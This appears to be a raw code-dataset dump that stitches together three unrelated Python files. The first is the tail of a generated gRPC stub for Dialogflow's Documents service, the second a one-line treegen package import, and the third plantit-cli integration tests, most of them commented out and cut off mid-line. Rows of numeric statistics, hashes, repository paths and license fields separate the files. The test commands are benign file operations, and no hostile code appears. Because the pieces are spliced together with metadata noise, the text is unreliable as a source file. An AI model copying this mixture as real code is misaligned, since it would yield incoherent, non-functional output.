only use `projects.knowledgeBases.documents`.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ReloadDocument(self, request, context):
"""Reloads the specified document from its specified source, content_uri or
content. The previously loaded content of the document will be deleted.
Note: Even when the content of the document has not changed, there still
may be side effects because of internal implementation changes.
Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
only use `projects.knowledgeBases.documents`.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def add_DocumentsServicer_to_server(servicer, server):
rpc_method_handlers = {
"ListDocuments": grpc.unary_unary_rpc_method_handler(
servicer.ListDocuments,
request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsRequest.FromString,
response_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsResponse.SerializeToString,
),
"GetDocument": grpc.unary_unary_rpc_method_handler(
servicer.GetDocument,
request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.GetDocumentRequest.FromString,
response_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.Document.SerializeToString,
),
"CreateDocument": grpc.unary_unary_rpc_method_handler(
servicer.CreateDocument,
request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.CreateDocumentRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"DeleteDocument": grpc.unary_unary_rpc_method_handler(
servicer.DeleteDocument,
request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.DeleteDocumentRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"UpdateDocument": grpc.unary_unary_rpc_method_handler(
servicer.UpdateDocument,
request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.UpdateDocumentRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
"ReloadDocument": grpc.unary_unary_rpc_method_handler(
servicer.ReloadDocument,
request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ReloadDocumentRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
"google.cloud.dialogflow.v2beta1.Documents", rpc_method_handlers
)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Documents(object):
"""Service for managing knowledge [Documents][google.cloud.dialogflow.v2beta1.Document].
"""
@staticmethod
def ListDocuments(
request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None,
):
return grpc.experimental.unary_unary(
request,
target,
"/google.cloud.dialogflow.v2beta1.Documents/ListDocuments",
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsRequest.SerializeToString,
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsResponse.FromString,
options,
channel_credentials,
call_credentials,
compression,
wait_for_ready,
timeout,
metadata,
)
@staticmethod
def GetDocument(
request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None,
):
return grpc.experimental.unary_unary(
request,
target,
"/google.cloud.dialogflow.v2beta1.Documents/GetDocument",
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.GetDocumentRequest.SerializeToString,
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.Document.FromString,
options,
channel_credentials,
call_credentials,
compression,
wait_for_ready,
timeout,
metadata,
)
@staticmethod
def CreateDocument(
request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None,
):
return grpc.experimental.unary_unary(
request,
target,
"/google.cloud.dialogflow.v2beta1.Documents/CreateDocument",
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.CreateDocumentRequest.SerializeToString,
google_dot_longrunning_dot_operations__pb2.Operation.FromString,
options,
channel_credentials,
call_credentials,
compression,
wait_for_ready,
timeout,
metadata,
)
@staticmethod
def DeleteDocument(
request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None,
):
return grpc.experimental.unary_unary(
request,
target,
"/google.cloud.dialogflow.v2beta1.Documents/DeleteDocument",
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.DeleteDocumentRequest.SerializeToString,
google_dot_longrunning_dot_operations__pb2.Operation.FromString,
options,
channel_credentials,
call_credentials,
compression,
wait_for_ready,
timeout,
metadata,
)
@staticmethod
def UpdateDocument(
request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None,
):
return grpc.experimental.unary_unary(
request,
target,
"/google.cloud.dialogflow.v2beta1.Documents/UpdateDocument",
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.UpdateDocumentRequest.SerializeToString,
google_dot_longrunning_dot_operations__pb2.Operation.FromString,
options,
channel_credentials,
call_credentials,
compression,
wait_for_ready,
timeout,
metadata,
)
@staticmethod
def ReloadDocument(
request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None,
):
return grpc.experimental.unary_unary(
request,
target,
"/google.cloud.dialogflow.v2beta1.Documents/ReloadDocument",
google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ReloadDocumentRequest.SerializeToString,
google_dot_longrunning_dot_operations__pb2.Operation.FromString,
options,
channel_credentials,
call_credentials,
compression,
wait_for_ready,
timeout,
metadata,
)
| 40.926829 | 141 | 0.699419 | 1,281 | 13,424 | 6.922717 | 0.114754 | 0.080514 | 0.039468 | 0.047925 | 0.842918 | 0.838746 | 0.816644 | 0.790934 | 0.754398 | 0.754398 | 0 | 0.01206 | 0.234058 | 13,424 | 327 | 142 | 41.051988 | 0.850418 | 0.126788 | 0 | 0.674419 | 1 | 0 | 0.093581 | 0.062533 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054264 | false | 0 | 0.011628 | 0.023256 | 0.100775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60280a5d1b14725d3ead8074024a7d90028debf9 | 148 | py | Python | treegen/__init__.py | stevenschmatz/treegen | 044d8efcb0948fada1b2318368b894c8d9d0ac2d | [
"MIT"
] | null | null | null | treegen/__init__.py | stevenschmatz/treegen | 044d8efcb0948fada1b2318368b894c8d9d0ac2d | [
"MIT"
] | null | null | null | treegen/__init__.py | stevenschmatz/treegen | 044d8efcb0948fada1b2318368b894c8d9d0ac2d | [
"MIT"
] | null | null | null | from .treegen import generate_trees_adjacency_matrix, generate_trees_level_order, non_isomorphic_rooted_tree_count, level_order_to_adjacency_matrix
| 74 | 147 | 0.925676 | 21 | 148 | 5.857143 | 0.714286 | 0.211382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047297 | 148 | 1 | 148 | 148 | 0.87234 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
6078f3ece7335bb4cb966837cc0c412f17830002 | 33,754 | py | Python | plantit_cli/tests/integration/test_scenarios.py | Computational-Plant-Science/plantit-cli | 020b6deaefb657e83e0e543f7bb2e55b7dd32158 | [
"BSD-3-Clause"
] | 2 | 2020-11-23T20:30:55.000Z | 2020-11-24T22:12:47.000Z | plantit_cli/tests/integration/test_scenarios.py | Computational-Plant-Science/plantit-cli | 020b6deaefb657e83e0e543f7bb2e55b7dd32158 | [
"BSD-3-Clause"
] | 30 | 2020-07-23T14:57:15.000Z | 2022-01-11T16:23:19.000Z | plantit_cli/tests/integration/test_scenarios.py | Computational-Plant-Science/plantit-cli | 020b6deaefb657e83e0e543f7bb2e55b7dd32158 | [
"BSD-3-Clause"
] | null | null | null | import os
import tempfile
from os import remove, environ
from os.path import join
import pytest
from plantit_cli import commands
from plantit_cli.store import terrain_commands
from plantit_cli.tests.integration.terrain_test_utils import create_collection, upload_file, delete_collection
from plantit_cli.tests.utils import clear_dir, check_hello, Token
message = "Message"
testdir = '/opt/plantit-cli/runs'
tempdir = tempfile.gettempdir()
token = '' # Token.get()
DEFAULT_SLEEP = 45
@pytest.mark.skip(reason='debug')
def test_pull_then_run_file_input(remote_base_path, file_name_1):
local_path = join(testdir, file_name_1)
remote_path = join(remote_base_path, "testCollection")
options = {
'workdir': testdir,
'image': "docker://alpine:latest",
'command': 'cat "$INPUT" > "$INPUT.output"',
'input': {'path': join(testdir, file_name_1), 'kind': 'file'}
}
try:
# prep CyVerse collection
create_collection(remote_path, token)
# prep file
with open(local_path, "w") as file1:
file1.write('Hello, 1!')
upload_file(local_path, remote_path, token)
remove(local_path)
# pull file to test directory
terrain_commands.pull(remote_path, testdir, cyverse_token=token)
# check file was pulled
downloaded_path = join(testdir, file_name_1)
check_hello(downloaded_path, 1)
remove(downloaded_path)
# expect 1 container
commands.run(
options=options,
docker_username=environ.get('DOCKER_USERNAME', None),
docker_password=environ.get('DOCKER_PASSWORD', None))
# check local output file was written
output_1 = f"{downloaded_path}.output"
check_hello(output_1, 1)
remove(output_1)
finally:
clear_dir(testdir)
delete_collection(remote_path, token)
@pytest.mark.skip(reason='debug')
def test_pull_then_run_file_input_and_parameters(remote_base_path, file_name_1):
local_path = join(testdir, file_name_1)
remote_path = join(remote_base_path, "testCollection")
options = {
'workdir': testdir,
'image': "docker://alpine:latest",
'command': 'cat $INPUT > $INPUT.$TAG.output',
'input': {'path': local_path, 'kind': 'file'},
'parameters': [{'key': 'TAG', 'value': message}]
}
try:
# prep CyVerse collection
create_collection(remote_path, token)
# prep file
with open(local_path, "w") as file1:
file1.write('Hello, 1!')
upload_file(local_path, remote_path, token)
os.remove(local_path)
# pull file to test directory
terrain_commands.pull(remote_path, testdir, cyverse_token=token)
# check file was pulled
check_hello(local_path, 1)
remove(local_path)
# expect 1 container
commands.run(
options=options,
docker_username=environ.get('DOCKER_USERNAME', None),
docker_password=environ.get('DOCKER_PASSWORD', None))
# check local output file was written
output_1 = f"{local_path}.{message}.output"
check_hello(output_1, 1)
remove(output_1)
finally:
clear_dir(testdir)
delete_collection(remote_path, token)
# def test_run_fails_with_no_params_and_file_input_and_no_output_when_no_inputs_found(remote_base_path, file_name_1):
# time.sleep(DEFAULT_SLEEP)
# plan = RunOptions(
# identifier='test_run_fails_with_no_params_and_file_input_and_no_output_when_no_inputs_found',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat "$INPUT" | tee "$INPUT.output"',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# cyverse_token=token)
#
# # expect exception
# with pytest.raises(PlantitException):
# Runner(TerrainStore(plan)).run(plan)
# time.sleep(DEFAULT_SLEEP)
#
#
# def test_run_fails_with_params_and_file_input_and_no_output_when_no_inputs_found(remote_base_path,
# file_name_1):
# time.sleep(DEFAULT_SLEEP)
# plan = RunOptions(
# identifier='test_run_fails_with_params_and_file_input_and_no_output_when_no_inputs_found',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat "$INPUT" | tee "$INPUT.$TAG.output"',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
# # expect exception
# with pytest.raises(PlantitException):
# Runner(TerrainStore(plan)).run(plan)
# time.sleep(DEFAULT_SLEEP)
#
#
# def test_run_succeeds_with_no_params_and_files_input_and_no_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_path_1 = join(testdir, file_name_1)
# local_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_files_input_and_no_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.output',
# input={
# 'kind': 'files',
# 'from': join(remote_base_path, "testCollection"),
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep files
# with open(local_path_1, "w") as file1, open(local_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_path_1, remote_path, token)
# upload_file(local_path_2, remote_path, token)
#
# # expect 2 containers
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were pulled
# downloaded_path_1 = join(testdir, 'input', file_name_1)
# downloaded_path_2 = join(testdir, 'input', file_name_2)
# check_hello(downloaded_path_1, 1)
# check_hello(downloaded_path_2, 2)
# remove(downloaded_path_1)
# remove(downloaded_path_2)
#
# # check local output files were written
# output_1 = f"{downloaded_path_1}.output"
# output_2 = f"{downloaded_path_2}.output"
# check_hello(output_1, 1)
# check_hello(output_2, 2)
# remove(output_1)
# remove(output_2)
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_files_input_and_patterns_and_no_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_path_1 = join(testdir, file_name_1)
# local_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_files_input_and_no_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.output',
# input={
# 'kind': 'files',
# 'from': join(remote_base_path, "testCollection"),
# 'patterns': [
# file_name_1
# ]
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep files
# with open(local_path_1, "w") as file1, open(local_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_path_1, remote_path, token)
# upload_file(local_path_2, remote_path, token)
#
# # expect 2 containers
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were pulled
# downloaded_path_1 = join(testdir, 'input', file_name_1)
# downloaded_path_2 = join(testdir, 'input', file_name_2)
# assert not isfile(downloaded_path_2)
# check_hello(downloaded_path_1, 1)
# remove(downloaded_path_1)
#
# # check local output files were written
# output_1 = f"{downloaded_path_1}.output"
# check_hello(output_1, 1)
# remove(output_1)
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_files_input_and_no_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_path_1 = join(testdir, file_name_1)
# local_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_files_input_and_no_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.$TAG.output',
# input={
# 'kind': 'files',
# 'from': join(remote_base_path, "testCollection"),
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep files
# with open(local_path_1, "w") as file1, open(local_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_path_1, remote_path, token)
# upload_file(local_path_2, remote_path, token)
#
# # expect 2 containers
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were pulled
# downloaded_path_1 = join(testdir, 'input', file_name_1)
# downloaded_path_2 = join(testdir, 'input', file_name_2)
# check_hello(downloaded_path_1, 1)
# check_hello(downloaded_path_2, 2)
# remove(downloaded_path_1)
# remove(downloaded_path_2)
#
# # check local output files were written
# output_1 = f"{downloaded_path_1}.{message}.output"
# output_2 = f"{downloaded_path_2}.{message}.output"
# check_hello(output_1, 1)
# check_hello(output_2, 2)
# remove(output_1)
# remove(output_2)
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_file_output(remote_base_path):
# local_output_path = join(testdir, 'output.txt')
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_file_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" >> $OUTPUT',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': 'output.txt',
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_path)
# check_hello(local_output_path, 'world')
# # os.remove(local_output_file)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, 'output.txt') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_file_output(remote_base_path):
# local_output_path = join(testdir, f"output.{message}.txt")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_file_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" >> $OUTPUT',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': f"output.{message}.txt",
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_path)
# check_hello(local_output_path, 'world')
# # os.remove(local_output_file)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"output.{message}.txt") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_directory_output(remote_base_path):
# local_output_path = testdir
# local_output_file_1 = join(local_output_path, 't1.txt')
# local_output_file_2 = join(local_output_path, 't2.txt')
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" | tee $OUTPUT/t1.txt $OUTPUT/t2.txt',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_1)
# assert isfile(local_output_file_2)
# check_hello(local_output_file_1, 'world')
# check_hello(local_output_file_2, 'world')
# remove(local_output_file_1)
# remove(local_output_file_2)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, 't1.txt') in [file['path'] for file in files]
# assert join(remote_path, 't2.txt') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# @pytest.mark.skip(reason="fails on GitHub Actions build (why?)")
# def test_run_succeeds_with_params_and_no_input_and_directory_output(remote_base_path):
# local_output_path = testdir
# local_output_file_1 = join(local_output_path, f"t1.{message}.txt")
# local_output_file_2 = join(local_output_path, f"t2.{message}.txt")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" | tee $OUTPUT/t1.$TAG.txt $OUTPUT/t2.$TAG.txt',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_1)
# assert isfile(local_output_file_2)
# check_hello(local_output_file_1, 'world')
# check_hello(local_output_file_2, 'world')
# remove(local_output_file_1)
# remove(local_output_file_2)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"t1.{message}.txt") in [file['path'] for file in files]
# assert join(remote_path, f"t2.{message}.txt") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_file_input_and_directory_output(
# remote_base_path,
# file_name_1):
# local_input_file_path = join(testdir, file_name_1)
# local_output_path = join(testdir, 'input') # write output files to input dir
# local_output_file_path = join(local_output_path, f"{file_name_1}.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_file_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.output',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': 'input', # write output files to input dir
# 'include': {'patterns': ['output'], 'names': []}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path, "w") as file1:
# file1.write('Hello, 1!')
# upload_file(local_input_file_path, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_file_path)
# check_hello(local_output_file_path, '1')
# remove(local_output_file_path)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"{file_name_1}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_file_input_and_directory_output(
# remote_base_path,
# file_name_1):
# local_input_file_path = join(testdir, file_name_1)
# local_output_path = join(testdir, 'input') # write output files to input dir
# local_output_file_path = join(local_output_path, f"{file_name_1}.{message}.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_file_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.$TAG.output',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': 'input', # write output files to input dir
# 'include': {'patterns': ['output'], 'names': []}
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path, "w") as file1:
# file1.write('Hello, 1!')
# upload_file(local_input_file_path, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_file_path)
# check_hello(local_output_file_path, '1')
# remove(local_output_file_path)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"{file_name_1}.{message}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_directory_input_and_directory_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_input_file_path_1 = join(testdir, file_name_1)
# local_input_file_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# local_output_dir = join(testdir, 'input') # write output files to input dir
# local_output_path = join(local_output_dir, f"{join(testdir, 'input')}.output")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_directory_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='ls $INPUT | tee $INPUT.output',
# input={
# 'kind': 'directory',
# 'from': remote_path,
# },
# output={
# 'to': remote_path,
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path_1, "w") as file1, open(local_input_file_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_input_file_path_1, remote_path, token)
# upload_file(local_input_file_path_2, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_path)
# with open(local_output_path) as file:
# lines = file.readlines()
# assert len(lines) == 2
# assert local_input_file_path_1.split('/')[-1] in lines[0]
# assert local_input_file_path_2.split('/')[-1] in lines[1]
# remove(local_output_path)
#
# # check file was pushed to store
# files = list_files(remote_path, token)
# assert join(remote_path, local_output_path.split('/')[-1]) in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_directory_input_and_directory_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_input_file_path_1 = join(testdir, file_name_1)
# local_input_file_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# local_output_dir = join(testdir, 'input') # write output files to input dir
# local_output_path = join(local_output_dir, f"{join(testdir, 'input')}.{message}.output")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_directory_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='ls $INPUT | tee $INPUT.$TAG.output',
# input={
# 'kind': 'directory',
# 'from': remote_path,
# },
# output={
# 'to': remote_path,
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []}
# },
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ],
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path_1, "w") as file1, open(local_input_file_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_input_file_path_1, remote_path, token)
# upload_file(local_input_file_path_2, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_path)
# with open(local_output_path) as file:
# lines = file.readlines()
# assert len(lines) == 2
# assert local_input_file_path_1.split('/')[-1] in lines[0]
# assert local_input_file_path_2.split('/')[-1] in lines[1]
# remove(local_output_path)
#
# # check file was pushed to store
# files = list_files(remote_path, token)
# assert join(remote_path, local_output_path.split('/')[-1]) in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_excludes(remote_base_path):
# local_output_path = testdir
# local_output_file_included = join(local_output_path, "included.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_excludes',
# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 1
# assert join(remote_path, 'included.output') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_directory_output_with_excludes(remote_base_path):
# local_output_path = testdir
# local_output_file_included = join(local_output_path, f"included.{message}.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_directory_output_with_excludes',
# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.$TAG.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 1
# assert join(remote_path, f"included.{message}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes(
# remote_base_path):
# local_output_path = testdir
# local_output_file_included = join(local_output_path, "included.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes',
